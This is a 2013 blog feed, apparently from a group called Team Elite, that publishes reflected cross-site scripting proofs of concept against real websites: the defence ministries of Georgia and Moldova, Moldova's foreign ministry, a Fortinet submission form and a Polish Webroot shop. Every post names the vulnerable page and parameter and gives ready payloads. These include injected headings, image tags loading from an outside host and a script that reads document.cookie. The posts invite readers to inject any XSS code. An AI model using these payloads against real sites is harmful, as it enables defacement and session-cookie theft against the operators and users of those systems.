This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
44.200.140.218.US.SSL

Ministry of Defence of Georgia - XSS

Vulnerable page: http://www.mod.gov.ge/?page=search

PoC:

Code
http://www.mod.gov.ge/?page=search&q="><h1>XSS found by Team Elite</h1>

Code
http://www.mod.gov.ge/?page=search&q="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.

XSS
XSS


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-11-29 13:33 0 comments 0 likes

Ministry of Defense of Republic of Moldova - XSS

Vulnerable page: http://www.army.md/?lng=3&action=show&cat=158

PoC
"><h1>XSS found by Team Elite</h1>
"><img src=http://te-home.net/images/logo.png>

You can include any XSS code in required fields to reproduce the bug.

Screenshot


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-11-28 18:46 0 comments 0 likes

Ministry of Foreign Affairs and European Integration of the RM - XSS

Vulnerable page: http://www.mfa.gov.md/search-result-form/

PoC:

Code
http://www.mfa.gov.md/search-result-form/?quotes=1&q="><h1>XSS found by Team Elite</h1>

Code
http://www.mfa.gov.md/search-result-form/?quotes=1&q="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.

XSS
XSS


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-11-28 13:04 0 comments 0 likes

Fortiguard.com virus scanner submission form XSS bug

Vulnerable page: https://submission.fortinet.com/ @ http://www.fortiguard.com/

PoC
POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><img src=http://te-home.net/images/logo.png>

POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><script>alert(document.cookie)</script>

You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.

Image tag
Script tag


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2013-11-28 08:39 0 comments 0 likes

Webroot (polish website) - XSS

Vulnerable page: http://wrpolska.pl/sklep/search.php

PoC:

Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>

Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search_query parameter.

XSS
XSS


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-11-27 01:28 0 comments 0 likes